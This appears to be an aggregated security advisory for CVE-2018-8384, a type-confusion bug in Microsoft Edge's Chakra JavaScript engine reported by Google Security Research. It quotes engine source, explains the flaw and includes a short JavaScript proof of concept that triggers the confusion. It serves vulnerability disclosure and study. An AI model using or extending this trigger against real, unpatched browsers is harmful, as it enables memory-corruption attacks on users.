Microsoft Edge Chakra PathTypeHandlerBase::SetAttributesHelper Type Confusion

🗓️ 18 Sep 2018 00:00:00Reported by Google Security ResearchType

packetstorm🔗 packetstormsecurity.com👁 48 Views

Microsoft Edge Chakra PathTypeHandlerBase::SetAttributesHelper Type Confusion CVE-2018-838

Reporter	Title	Published	Views	Family All 20
0day.today	Microsoft Edge Chakra PathTypeHandlerBase::SetAttributesHelper Type Confusion Exploit	18 Sep 201800:00	–	zdt
Circl	CVE-2018-8384	18 Sep 201800:00	–	circl
CNVD	Microsoft ChakraCore Scripting Engine Remote Memory Corruption Vulnerability	15 Aug 201800:00	–	cnvd
Check Point Advisories	Microsoft Chakra Scripting Engine Memory Corruption (CVE-2018-8384)	14 Aug 201800:00	–	checkpoint_advisories
CVE	CVE-2018-8384	15 Aug 201817:00	–	cve
Cvelist	CVE-2018-8384	15 Aug 201817:00	–	cvelist
Github Security Blog	ChakraCore RCE Vulnerability	13 May 202201:20	–	github
Kaspersky	KLA11306 Multiple vulnerabilities in Microsoft Browsers	14 Aug 201800:00	–	kaspersky
Microsoft CVE	Scripting Engine Memory Corruption Vulnerability	14 Aug 201807:00	–	mscve
NVD	CVE-2018-8384	15 Aug 201817:29	–	nvd

`Microsoft Edge: Chakra: Type confusion with PathTypeHandlerBase::SetAttributesHelper   
  
CVE-2018-8384  
  
  
Here's a snippet of PathTypeHandlerBase::SetAttributesHelper.  
  
PathTypeHandlerBase *predTypeHandler = this;  
DynamicType *currentType = instance->GetDynamicType();  
while (predTypeHandler->GetPathLength() > propertyIndex)  
{  
currentType = predTypeHandler->GetPredecessorType();  
if (currentType == nullptr)  
{  
#ifdef PROFILE_TYPES  
instance->GetScriptContext()->convertPathToDictionaryNoRootCount++;  
#endif  
// This can happen if object header inlining is deoptimized, and we haven't built a full path from the root.  
// For now, just punt this case.  
return TryConvertToSimpleDictionaryType(instance, GetPathLength())->SetAttributes(instance, propertyId, ObjectSlotAttributesToPropertyAttributes(propertyAttributes));  
}  
predTypeHandler = PathTypeHandlerBase::FromTypeHandler(currentType->GetTypeHandler());  
}  
  
When object header inlining is deoptimized, the type handler of the object is converted to a dictionary type handler. The problem is that it doesn't consider some attributes that dictionary type handlers don't have, so adding or removing those attributes can fail. ObjectSlotAttr_Accessor which indicates that the property is an accessor is one of them.  
  
Here's a snippet of PathTypeHandlerBase::SetPropertyInternal.  
  
else if (isInit)  
{  
ObjectSlotAttributes * attributes = this->GetAttributeArray();  
if (attributes && (attributes[index] & ObjectSlotAttr_Accessor))  
{  
this->SetAttributesHelper(instance, propertyId, index, attributes, (ObjectSlotAttributes)(attributes[index] & ~ObjectSlotAttr_Accessor), true);  
// We're changing an accessor into a data property at object init time. Don't cache this transition from setter to non-setter,  
// as it behaves differently from a normal set property.  
PropertyValueInfo::SetNoCache(info, instance);  
newTypeHandler = PathTypeHandlerBase::FromTypeHandler(instance->GetDynamicType()->GetTypeHandler());  
newTypeHandler->SetSlotUnchecked(instance, index, value);  
return true;  
}  
}  
  
We can use the bug to make removing ObjectSlotAttr_Accessor fail. As a result, a data value can be used as an accessor.  
  
PoC:  
let o = {  
get a() {},  
0: 0, // Deoptimizing object header inlining  
a: 0x1234  
};  
  
o.a; // Type confusion  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available (whichever is earlier), the bug  
report will become visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

18 Sep 2018 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.81268

microsoft edge; chakra; type confusion; pathtypehandlerbase; setattributeshelper; cve-2018-8384; objectslotattr_accessor; deoptimizing object header inlining; accessor fail; disclosure deadline; lokihardt